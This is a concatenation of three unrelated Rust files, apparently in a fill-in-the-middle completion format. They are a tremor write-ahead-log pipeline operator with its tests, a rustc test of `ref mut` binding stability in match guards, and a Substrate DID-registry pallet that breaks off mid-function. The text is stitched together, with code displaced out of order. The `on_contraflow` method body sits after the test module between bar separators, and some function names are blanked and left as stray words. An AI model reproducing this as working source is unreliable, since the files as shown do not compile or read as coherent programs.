use crate::{op::prelude::*, EventId, DEFAULT_STREAM_ID};
use byteorder::{BigEndian, ReadBytesExt};
use simd_json_derive::{Deserialize, Serialize};
use sled::IVec;
use std::io::Cursor;
use std::mem;
use std::ops::{Add, AddAssign};
use tremor_script::prelude::*;
#[derive(Clone, Copy, Default, PartialEq)]
struct Idx([u8; 8]);
#[cfg(not(tarpaulin_include))]
impl std::fmt::Debug for Idx {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "Idx({})", u64::from(self))
}
}
#[cfg(not(tarpaulin_include))]
impl std::fmt::Display for Idx {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "{}", u64::from(self))
}
}
impl AddAssign<u64> for Idx {
fn add_assign(&mut self, other: u64) {
let this: u64 = u64::from(&*self);
self.0 = unsafe { mem::transmute((this + other).to_be()) };
}
}
impl Add<u64> for Idx {
type Output = Idx;
fn add(self, rhs: u64) -> Self::Output {
Idx::from(u64::from(&self) + rhs)
}
}
impl Add<usize> for Idx {
type Output = Idx;
fn add(self, rhs: usize) -> Self::Output {
Idx::from(u64::from(&self) + rhs as u64)
}
}
impl From<&Idx> for u64 {
fn from(i: &Idx) -> u64 {
let mut rdr = Cursor::new(&i.0);
rdr.read_u64::<BigEndian>().unwrap_or(0)
}
}
impl From<IVec> for Idx {
fn from(v: IVec) -> Self {
let mut rdr = Cursor::new(v);
let res: u64 = rdr.read_u64::<BigEndian>().unwrap_or(0);
Self(unsafe { mem::transmute(res.to_be()) })
}
}
impl From<u64> for Idx {
fn from(v: u64) -> Self {
Self(unsafe { mem::transmute(v.to_be()) })
}
}
impl Idx {
fn set(&mut self, v: u64) {
self.0 = unsafe { mem::transmute(v.to_be()) };
}
fn set_min(&mut self, v: u64) {
if v < u64::from(&*self) {
self.0 = unsafe { mem::transmute(v.to_be()) };
}
}
}
impl AsRef<[u8]> for Idx {
fn as_ref(&self) -> &[u8] {
&self.0
}
}
impl From<&Idx> for IVec {
fn from(i: &Idx) -> Self {
IVec::from(&i.0)
}
}
#[derive(Debug, Clone, Deserialize, serde::Deserialize, serde::Serialize)]
pub struct Config {
/// Maximum number of events to read per tick/event when filling
/// up from the persistant storage
pub read_count: usize,
/// The directory to store data in, if no dir is provided this will use
/// a temporary storage that won't persist over restarts
pub dir: Option<String>,
/// The maximum elements to store before breaking the circuit
/// note this is an approximation we might store a few elements
/// above that to allow circuit breakers to kick in
pub max_elements: Option<u64>,
/// Maximum number of bytes the WAL is alloed to take on disk,
/// note this is a soft maximum and might be overshot slighty
pub max_bytes: Option<u64>,
/// Flush to disk on every write
flush_on_evnt: Option<bool>,
}
impl ConfigImpl for Config {}
#[derive(Debug, Clone)]
// TODO add seed value and field name as config items
/// A Write Ahead Log that will persist data to disk and feed the following operators from this disk
/// cache. It allows to run onramps that do not provide any support for delivery guarantees with
/// offramps that do.
///
/// The wal operator will intercept and generate it's own circuit breaker events. You can think about it
/// as a firewall that will protect all operators before itself from issues beyond it. On the other hand
/// it will indiscriminately consume data from sources and operators before itself until it's own
/// circuit breaking conditions are met.
///
/// At the same time will it interact with tremors guaranteed delivery system, events are only removed
/// from disk once they're acknowledged. In case of delivery failure the WAL operator will replay the
/// failed events. On the same way the WAL operator will acknowledge events that it persists to disk.
///
/// The WAL operator should be used with caution, since every event that passes through it will be
/// written to the hard drive it has a significant performance impact.
pub struct Wal {
/// Elements currently in the event storage
cnt: u64,
/// general DB
wal: sled::Db,
/// event storage
events_tree: sled::Tree,
/// state storage (written, etc)
state_tree: sled::Tree,
/// Next read index
read: Idx,
/// The last
confirmed: Option<Idx>,
/// The configuration
config: Config,
/// Are we currently in a broken CB state
broken: bool,
/// Did we signal because we're full
full: bool,
/// ID of this operator
origin_uri: Option<EventOriginUri>,
}
op!(WalFactory(_uid, node) {
let map = node.config.as_ref().ok_or_else(|| ErrorKind::MissingOpConfig(node.id.to_string()))?;
let config: Config = Config::new(&map)?;
if config.max_elements.or(config.max_bytes).is_none() {
Err(ErrorKind::BadOpConfig("WAL operator needs at least one of `max_elements` or `max_bytes` config entries.".to_string()).into())
} else {
Ok(Box::new(Wal::new(node.id.to_string(), config)?))
}
});
impl Wal {
const URI_SCHEME: &'static str = "tremor-wal";
// tree names
const EVENTS: &'static str = "events";
const STATE: &'static str = "state";
// keys in the state tree
const CONFIRMED: &'static str = "confirmed";
fn new(id: String, config: Config) -> Result<Self> {
let wal = if let Some(dir) = &config.dir {
sled::open(&dir)?
} else {
sled::Config::default().temporary(true).open()?
};
let events_tree = wal.open_tree(Self::EVENTS)?;
let state_tree = wal.open_tree(Self::STATE)?;
#[allow(clippy::cast_possible_truncation)]
let confirmed = state_tree.get(Self::CONFIRMED)?.map(Idx::from);
let read = confirmed.unwrap_or_default();
Ok(Wal {
cnt: events_tree.len() as u64,
wal,
read,
confirmed,
events_tree,
state_tree,
config,
broken: true,
full: false,
origin_uri: Some(EventOriginUri {
uid: 0,
scheme: Self::URI_SCHEME.to_string(),
host: "pipeline".to_string(),
port: None,
path: vec![id],
}),
})
}
fn limit_reached(&self) -> Result<bool> {
let max_bytes = self.config.max_bytes.unwrap_or(u64::MAX);
let exceeds_max_bytes = self.wal.size_on_disk()? >= max_bytes;
Ok(self.config.max_elements.map_or(false, |me| self.cnt >= me) || exceeds_max_bytes)
}
fn read_events(&mut self, _now: u64) -> Result<Vec<(Cow<'static, str>, Event)>> {
// The maximum number of entries we read
let mut events = Vec::with_capacity(self.config.read_count as usize);
for (num_read, e) in self.events_tree.range(self.read..).enumerate() {
if num_read > self.config.read_count {
break;
}
let (idx, mut e) = e?;
self.read = idx.into();
self.read += 1;
let e_slice: &mut [u8] = &mut e;
let mut event = Event::from_slice(e_slice)?;
event.transactional = true;
events.push((OUT, event))
}
self.gc()?;
Ok(events)
}
fn store_event(&mut self, source_id: u64, mut event: Event) -> Result<()> {
let wal_id = self.wal.generate_id()?;
let write: [u8; 8] = unsafe { mem::transmute(wal_id.to_be()) };
// TODO: figure out if handling of separate streams makes sense here
let mut new_event_id = EventId::new(source_id, DEFAULT_STREAM_ID, wal_id);
new_event_id.track(&event.id);
event.id = new_event_id;
// Serialize and write the event
let event_buf = event.json_vec()?;
self.events_tree.insert(write, event_buf.as_slice())?;
if self.config.flush_on_evnt.unwrap_or_default() {
self.events_tree.flush()?;
}
self.cnt += 1;
Ok(())
}
fn gc(&mut self) -> Result<u64> {
let mut i = 0;
if let Some(confirmed) = self.confirmed {
for e in self.events_tree.range(..=confirmed) {
i += 1;
self.cnt -= 1;
let (idx, _) = e?;
self.events_tree.remove(idx)?;
}
}
Ok(i)
}
}
fn maybe_parse_ivec(e: Option<IVec>) -> Option<Event> {
let e_slice: &mut [u8] = &mut e?;
Event::from_slice(e_slice).ok()
}
impl Operator for Wal {
#[cfg(not(tarpaulin_include))]
fn handles_contraflow(&self) -> bool {
true
}
#[allow(clippy::clippy::option_if_let_else)] // borrow checker
fn on_contraflow(&mut self, u_id: u64, insight: &mut Event) |
#[cfg(not(tarpaulin_include))]
fn handles_signal(&self) -> bool {
true
}
fn on_signal(
&mut self,
_uid: u64,
_state: &Value<'static>,
signal: &mut Event,
) -> Result<EventAndInsights> {
let now = signal.ingest_ns;
// Are we currently full?
let now_full = self.limit_reached()?;
// If we just became full or we went from full to non full
// update the CB status
let insights = if self.full && !now_full {
warn!("WAL not full any more. {} elements.", self.cnt);
let mut e = Event::cb_restore(signal.ingest_ns);
e.origin_uri = self.origin_uri.clone();
vec![e]
} else if !self.full && now_full {
warn!("WAL full. {} elements.", self.cnt);
let mut e = Event::cb_trigger(signal.ingest_ns);
e.origin_uri = self.origin_uri.clone();
vec![e]
} else {
vec![]
};
self.full = now_full;
let events = if self.broken {
vec![]
} else {
self.read_events(now)?
};
Ok(EventAndInsights { events, insights })
}
fn on_event(
&mut self,
uid: u64,
_port: &str,
_state: &mut Value<'static>,
event: Event,
) -> Result<EventAndInsights> {
let id = event.id.clone();
let ingest_ns = event.ingest_ns;
let transactional = event.transactional;
let op_meta = if transactional {
Some(event.op_meta.clone())
} else {
None
};
self.store_event(uid, event)?;
let insights = if let Some(op_meta) = op_meta {
let mut insight = Event::cb_ack(ingest_ns, id);
insight.op_meta = op_meta;
vec![insight]
} else {
vec![]
};
let events = if self.broken {
Vec::new()
} else {
self.read_events(ingest_ns)?
};
Ok(EventAndInsights { events, insights })
}
}
#[cfg(test)]
mod test {
use crate::EventIdGenerator;
use crate::SignalKind;
use super::*;
use tempfile::Builder as TempDirBuilder;
#[test]
fn test_gc() -> Result<()> {
let c = Config {
read_count: 1,
dir: None,
max_elements: Some(10),
max_bytes: None,
flush_on_evnt: None,
};
let mut o = Wal::new("test".to_string(), c)?;
let wal_uid = 0_u64;
let source_uid = 42_u64;
let mut idgen = EventIdGenerator::new(source_uid);
// we start in a broken state
let id = idgen.next_id();
let mut e = Event::default();
let mut state = Value::null();
//send first event
e.id = id.clone();
e.transactional = true;
let mut op_meta = OpMeta::default();
op_meta.insert(42, OwnedValue::null());
e.op_meta = op_meta;
let mut r = o.on_event(wal_uid, "in", &mut state, e.clone())?;
assert_eq!(0, r.events.len());
assert_eq!(1, r.insights.len());
let insight = &r.insights[0];
assert_eq!(CbAction::Ack, insight.cb);
assert_eq!(1, o.cnt);
assert_eq!(None, o.confirmed);
// Restore the CB
let mut i = Event::cb_restore(0);
o.on_contraflow(wal_uid, &mut i);
// we have 1 event stored
assert_eq!(1, o.cnt);
assert_eq!(None, o.confirmed);
// send second event, expect both events back
let id2 = idgen.next_id();
e.id = id2.clone();
e.transactional = true;
let mut op_meta = OpMeta::default();
op_meta.insert(42, OwnedValue::null());
e.op_meta = op_meta;
r = o.on_event(wal_uid, "in", &mut state, e.clone())?;
assert_eq!(2, r.events.len());
assert!(
r.events[0].1.id.is_tracking(&id),
"not tracking the origin event"
);
assert!(
r.events[1].1.id.is_tracking(&id2),
"not tracking the origin event"
);
assert_eq!(1, r.insights.len());
let insight = &r.insights[0];
assert_eq!(CbAction::Ack, insight.cb);
// we have two events stored
assert_eq!(2, o.cnt);
assert_eq!(None, o.confirmed);
// acknowledge the first event
i = Event::cb_ack(e.ingest_ns, r.events[0].1.id.clone());
o.on_contraflow(wal_uid, &mut i);
// we still have two events stored
assert_eq!(2, o.cnt);
assert_eq!(Some(Idx::from(id.event_id())), o.confirmed);
// apply gc on signal
let mut signal = Event {
id: idgen.next_id(),
ingest_ns: 1,
kind: Some(SignalKind::Tick),
..Event::default()
};
let s = o.on_signal(wal_uid, &state, &mut signal)?;
assert_eq!(0, s.events.len());
assert_eq!(0, s.insights.len());
// now we have 1 left
assert_eq!(1, o.cnt);
assert_eq!(Some(Idx::from(id.event_id())), o.confirmed);
// acknowledge the second event
i = Event::cb_ack(e.ingest_ns, r.events[1].1.id.clone());
o.on_contraflow(wal_uid, &mut i);
// still 1 left
assert_eq!(1, o.cnt);
assert_eq!(Some(Idx::from(id2.event_id())), o.confirmed);
// apply gc on signal
let mut signal2 = Event {
id: idgen.next_id(),
ingest_ns: 1,
kind: Some(SignalKind::Tick),
..Event::default()
};
let s = o.on_signal(wal_uid, &state, &mut signal2)?;
assert_eq!(0, s.events.len());
assert_eq!(0, s.insights.len());
// we are clean now
assert_eq!(0, o.cnt);
assert_eq!(Some(Idx::from(id2.event_id())), o.confirmed);
Ok(())
}
#[test]
fn rw() -> Result<()> {
let c = Config {
read_count: 100,
dir: None,
max_elements: None,
max_bytes: Some(1024 * 1024),
flush_on_evnt: None,
};
let mut o = Wal::new("test".to_string(), c)?;
let wal_uid = 0_u64;
let source_uid = 42_u64;
let mut idgen = EventIdGenerator::new(source_uid);
let mut v = Value::null();
let mut e = Event::default();
e.id = idgen.next_id();
// The operator start in broken status
// Send a first event
let r = o.on_event(wal_uid, "in", &mut v, e.clone())?;
// Since we are broken we should get nothing back
assert_eq!(r.len(), 0);
assert_eq!(r.insights.len(), 0);
// Restore the CB
let mut i = Event::cb_restore(0);
o.on_contraflow(0, &mut i);
// Send a second event
e.id = idgen.next_id();
e.transactional = true;
let mut op_meta = OpMeta::default();
op_meta.insert(42, OwnedValue::null());
e.op_meta = op_meta;
let mut r = o.on_event(wal_uid, "in", &mut v, e.clone())?;
// Since we are restored we now get 2 events (1 and 2)
assert_eq!(r.len(), 2);
assert_eq!(r.insights.len(), 1); // we get an ack back
let insight = r.insights.pop().expect("no insight");
assert_eq!(insight.cb, CbAction::Ack);
assert!(insight.op_meta.contains_key(42));
assert!(!insight.op_meta.contains_key(wal_uid));
// extract the ids assigned by the WAL and tracked in the event ids
let id_e1 = r.events.first().map(|(_, event)| &event.id).unwrap();
let id_e2 = r.events.get(1).map(|(_, event)| &event.id).unwrap();
// Send a fail event beck to the source through the WAL, this tell the WAL that delivery of
// 2 failed and they need to be delivered again
let mut i = Event::default();
i.id = id_e2.clone();
i.cb = CbAction::Fail;
o.on_contraflow(0, &mut i);
// Send a third event
e.id = idgen.next_id();
e.transactional = false;
let r = o.on_event(0, "in", &mut v, e.clone())?;
// since we failed before we should see 2 events, 3 and the retransmit
// of 2
assert_eq!(r.len(), 2);
// Send a fail event back to the source for the first event, this will tell the WAL that delivery of
// 1, 2, 3 failed and they need to be delivered again
let mut i = Event::default();
i.id = id_e1.clone();
i.cb = CbAction::Fail;
o.on_contraflow(0, &mut i);
// since we failed before we should see 3 events the retransmit of 1-3
let r = o.on_signal(0, &v, &mut i)?;
assert_eq!(r.len(), 3);
o.gc()?;
Ok(())
}
#[test]
// tests that the wal works fine
// after a restart of the tremor server
fn restart_wal_regression() -> Result<()> {
let temp_dir = TempDirBuilder::new()
.prefix("tremor-pipeline-wal")
.tempdir()?;
let read_count = 100;
let c = Config {
read_count,
dir: Some(temp_dir.path().to_string_lossy().into_owned()),
max_elements: Some(10),
max_bytes: Some(1024 * 1024),
flush_on_evnt: None,
};
let mut v = Value::null();
let e = Event::default();
let wal_uid = 0;
{
// create the operator - first time
let mut o1 = WalFactory::new()
.from_node(wal_uid, &NodeConfig::from_config("wal-test-1", c.clone())?)?;
// Restore the CB
let mut i = Event::cb_restore(0);
o1.on_contraflow(wal_uid, &mut i);
// send a first event - not acked. so it lingers around in our WAL
let r = o1.on_event(1, "in", &mut v, e.clone())?;
assert_eq!(r.events.len(), 1);
assert_eq!(r.insights.len(), 0);
}
{
// create the operator - second time
// simulating a tremor restart
let mut o2 =
WalFactory::new().from_node(wal_uid, &NodeConfig::from_config("wal-test-2", c)?)?;
// Restore the CB
let mut i = Event::cb_restore(1);
o2.on_contraflow(wal_uid, &mut i);
// send a first event - not acked. so it lingers around in our WAL
let r = o2.on_event(wal_uid, "in", &mut v, e.clone())?;
assert_eq!(r.events.len(), 2);
let id1 = &r.events[0].1.id;
let id2 = &r.events[1].1.id;
assert_eq!(id1.get_max_by_stream(wal_uid, 0).unwrap(), 0);
// ensure we actually had a gap bigger than read count, which triggers the error condition
assert!(
id2.get_max_by_stream(wal_uid, 0).unwrap()
- id1.get_max_by_stream(wal_uid, 0).unwrap()
> read_count as u64
);
assert_eq!(r.insights.len(), 0);
let r = o2.on_event(wal_uid, "in", &mut v, e.clone())?;
assert_eq!(r.events.len(), 1);
}
Ok(())
}
#[test]
fn test_invalid_config() -> Result<()> {
let c = Config {
read_count: 10,
dir: None,
max_elements: None,
max_bytes: None,
flush_on_evnt: None,
};
let r = WalFactory::new().from_node(1, &NodeConfig::from_config("wal-test-1", c.clone())?);
assert!(r.is_err());
if let Err(Error(ErrorKind::BadOpConfig(s), _)) = r {
assert_eq!(
"WAL operator needs at least one of `max_elements` or `max_bytes` config entries.",
s.as_str()
);
}
Ok(())
}
#[test]
fn from() -> Result<()> {
assert_eq!(42, u64::from(&(Idx::from(40u64) + 2u64)));
assert_eq!(42, u64::from(&(Idx::from(40u64) + 2usize)));
Ok(())
}
#[test]
fn as_ref() -> Result<()> {
let i = Idx::from(42u64);
let s: &[u8] = i.as_ref();
assert_eq!(&[0, 0, 0, 0, 0, 0, 0, 42u8][..], s);
Ok(())
}
}
| {
match insight.cb {
CbAction::None => {}
CbAction::Open => {
debug!("WAL CB open.");
self.broken = false
}
CbAction::Close => {
debug!("WAL CB close");
self.broken = true
}
CbAction::Ack => {
let event_id =
if let Some((_stream_id, event_id)) = insight.id.get_max_by_source(u_id) {
event_id
} else {
// This is not for us
return;
};
trace!("WAL confirm: {}", event_id);
let confirmed = self.confirmed.get_or_insert_with(|| Idx::from(event_id));
confirmed.set(event_id);
if let Err(e) = self.state_tree.insert(Self::CONFIRMED, &*confirmed) {
error!("Failed to persist confirm state: {}", e);
}
if let Some(e) = self
.events_tree
.get(confirmed)
.ok()
.and_then(maybe_parse_ivec)
{
insight.id.track(&e.id);
}
}
CbAction::Fail => {
let event_id =
if let Some((_stream_id, event_id)) = insight.id.get_min_by_source(u_id) {
event_id
} else {
// This is not for us
return;
};
trace!("WAL fail: {}", event_id);
self.read.set_min(event_id);
if let Some(e) = self.confirmed.and_then(|confirmed| {
self.events_tree
.get(confirmed)
.ok()
.and_then(maybe_parse_ivec)
}) {
insight.id.track(&e.id);
}
let current_confirmed = self.confirmed.map(|v| u64::from(&v)).unwrap_or_default();
if event_id < current_confirmed {
warn!(
"trying to fail a message({}) that was already confirmed({})",
event_id, current_confirmed
);
// resetting confirmed to older event_id
let confirmed = Idx::from(event_id);
self.confirmed = Some(confirmed);
if let Err(e) = self.state_tree.insert(Self::CONFIRMED, &confirmed) {
error!("Failed to persist confirm state: {}", e);
}
}
}
}
insight.cb = CbAction::None;
} |
match-ref-mut-stability.rs | // Check that `ref mut` variables don't change address between the match guard
// and the arm expression.
// run-pass
#![feature(nll, bind_by_move_pattern_guards)]
// Test that z always point to the same temporary.
fn referent_stability() {
let p;
match 0 {
ref mut z if { p = z as *const _; true } => assert_eq!(p, z as *const _),
_ => unreachable!(),
};
}
// Test that z is always effectively the same variable.
fn | () {
let p;
match 0 {
ref mut z if { p = &z as *const _; true } => assert_eq!(p, &z as *const _),
_ => unreachable!(),
};
}
// Test that a borrow of *z can cross from the guard to the arm.
fn persist_borrow() {
let r;
match 0 {
ref mut z if { r = z as &_; true } => assert_eq!(*r, 0),
_ => unreachable!(),
}
}
fn main() {
referent_stability();
variable_stability();
persist_borrow();
}
| variable_stability |
lib.rs | #![cfg_attr(not(feature = "std"), no_std)]
extern crate alloc;
use alloc::{format, str, string::*};
use codec::{Decode, Encode};
/// Edit this file to define custom logic or remove it if it is not needed.
/// Learn more about FRAME and the core library of Substrate FRAME pallets:
/// https://substrate.dev/docs/en/knowledgebase/runtime/frame
use frame_support::{decl_error, decl_event, decl_module, decl_storage, dispatch, ensure};
use frame_system::ensure_signed;
use sp_std::vec::Vec;
#[cfg(test)]
mod mock;
#[cfg(test)]
mod tests;
/// Configure the pallet by specifying the parameters and types on which it depends.
pub trait Trait: frame_system::Trait + pallet_timestamp::Trait {
/// Because this pallet emits events, it depends on the runtime's definition of an event.
type Event: From<Event<Self>> + Into<<Self as frame_system::Trait>::Event>;
}
const VALID: u8 = 0;
const DEACTIVE: u8 = 1;
#[derive(Encode, Decode, Default)]
pub struct PkList<A> {
pk_list: Vec<Pk<A>>,
}
impl<A: core::cmp::Eq> PkList<A> {
pub fn new_default(controller: Vec<u8>, acc: A) -> Self {
let mut l = Vec::new();
l.push(Pk::new_acc_and_auth(controller, acc));
PkList { pk_list: l }
}
pub fn contains(&self, acc: &A) -> bool {
for v in self.pk_list.iter() {
if &v.public_key == acc {
return true;
}
}
return false;
}
pub fn have_access(&self, acc: &A) -> bool {
for v in self.pk_list.iter() {
if &v.public_key == acc {
if v.deactivated == false && v.is_authentication == true {
return true;
}
}
}
return false;
}
pub fn push(&mut self, account_id: Pk<A>) {
self.pk_list.push(account_id);
}
pub fn deactivate_acc(&mut self, acc: &A) {
for v in self.pk_list.iter_mut() {
if &v.public_key == acc {
v.deactivated = true;
return;
}
}
return;
}
pub fn set_acc_auth(&mut self, acc: &A) {
for v in self.pk_list.iter_mut() {
if &v.public_key == acc {
v.is_authentication = true;
return;
}
}
return;
}
pub fn remove_acc_auth(&mut self, acc: &A) {
for v in self.pk_list.iter_mut() {
if &v.public_key == acc {
v.is_authentication = false;
return;
}
}
return;
}
pub fn find_acc(&self, acc: &A) -> Option<u32> {
for (index, v) in self.pk_list.iter().enumerate() {
if &v.public_key == acc {
return Some(index as u32);
}
}
return None;
}
pub fn | (&self) -> u32 {
self.pk_list.len() as u32
}
}
impl<A: core::convert::AsRef<[u8]> + core::cmp::Eq> PkList<A> {
pub fn to_json(&self, did: &Vec<u8>) -> Vec<PkJson> {
let mut result = Vec::new();
for (i, v) in self.pk_list.iter().enumerate() {
if !v.is_pk_list {
continue;
}
let tp: String = "".to_string();
// match v.public_key[0] {
// 0 => tp = KeyType::Ed25519VerificationKey2018.to_string(),
// 1 => tp = KeyType::EcdsaSecp256k1VerificationKey2019.to_string(),
// _ => {}
// }
let pk_json = PkJson {
id: format!("{}#keys-{}", str::from_utf8(did).ok().unwrap(), i + 1),
tp,
controller: str::from_utf8(&v.controller).ok().unwrap().to_string(),
public_key_hex: format!("{:x?}", v.public_key.as_ref()),
};
result.push(pk_json);
}
result
}
pub fn to_authentication_json(
&self,
did: &Vec<u8>,
authentication_list: Vec<u32>,
) -> Vec<AuthenticationJson> {
let mut result = Vec::new();
for i in authentication_list.iter() {
let public_key: &Pk<A> = self.pk_list.get(*i as usize).unwrap();
if public_key.is_pk_list {
let authentication = AuthenticationJson::Pk(format!(
"{}#keys-{}",
str::from_utf8(did).ok().unwrap(),
i + 1
));
result.push(authentication);
} else {
let tp: String = "".to_string();
// match public_key.public_key[0] {
// 0 => tp = KeyType::Ed25519VerificationKey2018.to_string(),
// 1 => tp = KeyType::EcdsaSecp256k1VerificationKey2019.to_string(),
// _ => {}
// }
let authentication = AuthenticationJson::NotPK(PkJson {
id: format!("{}#keys-{}", str::from_utf8(did).ok().unwrap(), i + 1),
tp,
controller: str::from_utf8(&public_key.controller)
.ok()
.unwrap()
.to_string(),
public_key_hex: format!("{:x?}", public_key.public_key.as_ref()),
});
result.push(authentication);
}
}
result
}
}
#[derive(Encode, Decode, Default)]
pub struct Pk<A> {
controller: Vec<u8>,
public_key: A,
deactivated: bool,
is_pk_list: bool,
is_authentication: bool,
}
impl<A> Pk<A> {
pub fn new_acc_and_auth(controller: Vec<u8>, acc: A) -> Self {
Pk {
controller,
public_key: acc,
deactivated: false,
is_pk_list: true,
is_authentication: true,
}
}
pub fn new_acc(controller: Vec<u8>, acc: A) -> Self {
Pk {
controller,
public_key: acc,
deactivated: false,
is_pk_list: true,
is_authentication: false,
}
}
pub fn new_auth(controller: Vec<u8>, acc: A) -> Self {
Pk {
controller,
public_key: acc,
deactivated: false,
is_pk_list: false,
is_authentication: true,
}
}
}
#[derive(Encode, Decode, Default)]
pub struct Service {
id: Vec<u8>,
tp: Vec<u8>,
service_endpoint: Vec<u8>,
}
impl Service {
pub fn to_json(&self) -> ServiceJson {
ServiceJson {
id: str::from_utf8(&self.id).ok().unwrap().to_string(),
tp: str::from_utf8(&self.tp).ok().unwrap().to_string(),
service_endpoint: str::from_utf8(&self.service_endpoint)
.ok()
.unwrap()
.to_string(),
}
}
}
pub struct PkJson {
id: String,
tp: String,
controller: String,
public_key_hex: String,
}
pub struct ServiceJson {
id: String,
tp: String,
service_endpoint: String,
}
pub enum AuthenticationJson {
Pk(String),
NotPK(PkJson),
}
pub struct Document<A> {
pub contexts: Vec<String>,
pub id: String,
pub public_key: Vec<PkJson>,
pub authentication: Vec<AuthenticationJson>,
pub controller: Vec<String>,
pub service: Vec<ServiceJson>,
pub created: A,
pub updated: A,
}
// The pallet's runtime storage items.
// https://substrate.dev/docs/en/knowledgebase/runtime/storage
decl_storage! {
// A unique name is used to ensure that the pallet's storage items are isolated.
// This name may be updated, but each pallet in the runtime must use a unique name.
// ---------------------------------vvvvvvvvvvvvvv
trait Store for Module<T: Trait> as DID {
// Learn more about declaring storage items:
// https://substrate.dev/docs/en/knowledgebase/runtime/storage#declaring-storage-items
pub StatusStore: map hasher(blake2_128_concat) Vec<u8> => u8;
pub ContextStore: map hasher(blake2_128_concat) Vec<u8> => Vec<Vec<u8>> = Vec::new();
pub PkListStore: map hasher(blake2_128_concat) Vec<u8> => PkList<T::AccountId>;
pub AuthenticationStore: map hasher(blake2_128_concat) Vec<u8> => Vec<u32> = Vec::new();
pub ControllerStore: map hasher(blake2_128_concat) Vec<u8> => Vec<Vec<u8>> = Vec::new();
pub ServiceStore: map hasher(blake2_128_concat) Vec<u8> => Vec<Service> = Vec::new();
pub CreatedStore: map hasher(blake2_128_concat) Vec<u8> => T::Moment;
pub UpdatedStore: map hasher(blake2_128_concat) Vec<u8> => T::Moment;
}
}
// Pallets use events to inform users when important changes are made.
// https://substrate.dev/docs/en/knowledgebase/runtime/events
decl_event!(
pub enum Event<T>
where
AccountId = <T as frame_system::Trait>::AccountId,
{
/// Event documentation should end with an array that provides descriptive names for event
/// parameters.
RegisterWithAccount(Vec<u8>, AccountId),
DeactivateDid(Vec<u8>),
AddController(Vec<u8>, Vec<u8>),
RemoveController(Vec<u8>, Vec<u8>),
AddKey(Vec<u8>, AccountId, Vec<u8>),
DeactivateKey(Vec<u8>, AccountId),
AddNewAuthKey(Vec<u8>, AccountId, Vec<u8>),
SetAuthKey(Vec<u8>, AccountId),
DeactivateAuthKey(Vec<u8>, AccountId),
AddNewAuthKeyByController(Vec<u8>, AccountId, Vec<u8>),
SetAuthKeyByController(Vec<u8>, AccountId),
DeactivateAuthKeyByController(Vec<u8>, AccountId),
AddService(Vec<u8>, Vec<u8>, Vec<u8>, Vec<u8>),
UpdateService(Vec<u8>, Vec<u8>, Vec<u8>, Vec<u8>),
RemoveService(Vec<u8>, Vec<u8>),
AddContext(Vec<u8>, Vec<u8>),
RemoveContext(Vec<u8>, Vec<u8>),
VerifySignature(Vec<u8>),
VerifyController(Vec<u8>, Vec<u8>),
}
);
// Errors inform users that something went wrong.
decl_error! {
pub enum Error for Module<T: Trait> {
/// Error names should be descriptive.
AlreadyRegistered,
/// Errors should have helpful documentation associated with them.
NotRegistered,
Invalid,
NoAccess,
ControllerExist,
ControllerNotExist,
AccountIdExist,
AccountIdNotExist,
AccountIdDeactivated,
ServiceExist,
ServiceNotExist,
ContextExist,
ContextNotExist,
}
}
// Dispatchable functions allows users to interact with the pallet and invoke state changes.
// These functions materialize as "extrinsics", which are often compared to transactions.
// Dispatchable functions must be annotated with a weight and must return a DispatchResult.
decl_module! {
pub struct Module<T: Trait> for enum Call where origin: T::Origin {
// Errors must be initialized if they are used by the pallet.
type Error = Error<T>;
// Events must be initialized if they are used by the pallet.
fn deposit_event() = default;
/// An example dispatchable that takes a singles value as a parameter, writes the value to
/// storage and emits an event. This function must be dispatched by a signed extrinsic.
#[weight = 0]
pub fn reg_did_using_account(origin, did: Vec<u8>) -> dispatch::DispatchResult {
// Check that the extrinsic was signed and get the signer.
// This function will return an error if the extrinsic is not signed.
// https://substrate.dev/docs/en/knowledgebase/runtime/origin
let sender = ensure_signed(origin)?;
// Verify that the specified accountId has not already been registered.
ensure!(!StatusStore::contains_key(&did), Error::<T>::AlreadyRegistered);
// Update storage.
StatusStore::insert(&did, VALID);
<PkListStore<T>>::insert(&did, PkList::<T::AccountId>::new_default(did.clone(), sender.clone()));
let mut a = Vec::new();
a.push(0);
AuthenticationStore::insert(&did, a);
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<CreatedStore<T>>::insert(&did, now_timestamp);
// Emit an event.
Self::deposit_event(RawEvent::RegisterWithAccount(did, sender));
// Return a successful DispatchResult
Ok(())
}
#[weight = 0]
pub fn deactivate_did(origin, did: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
// Update storage.
StatusStore::insert(&did, DEACTIVE);
ContextStore::remove(&did);
<PkListStore<T>>::remove(&did);
AuthenticationStore::remove(&did);
ControllerStore::remove(&did);
ServiceStore::remove(&did);
<CreatedStore<T>>::remove(&did);
<UpdatedStore<T>>::remove(&did);
Self::deposit_event(RawEvent::DeactivateDid(did));
Ok(())
}
#[weight = 0]
pub fn add_controller(origin, did: Vec<u8>, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let controller_list = ControllerStore::get(&did);
ensure!(!controller_list.contains(&controller), Error::<T>::ControllerExist);
ControllerStore::mutate(&did, |c| c.push(controller.clone()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddController(did, controller));
Ok(())
}
#[weight = 0]
pub fn remove_controller(origin, did: Vec<u8>, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
let index = controller_list
.iter()
.position(|x| x == &controller)
.unwrap();
ControllerStore::mutate(&did, |c| c.remove(index));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::RemoveController(did, controller));
Ok(())
}
#[weight = 0]
pub fn add_key(origin, did: Vec<u8>, key: T::AccountId, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
ensure!(!account_id_list.contains(&key), Error::<T>::AccountIdExist);
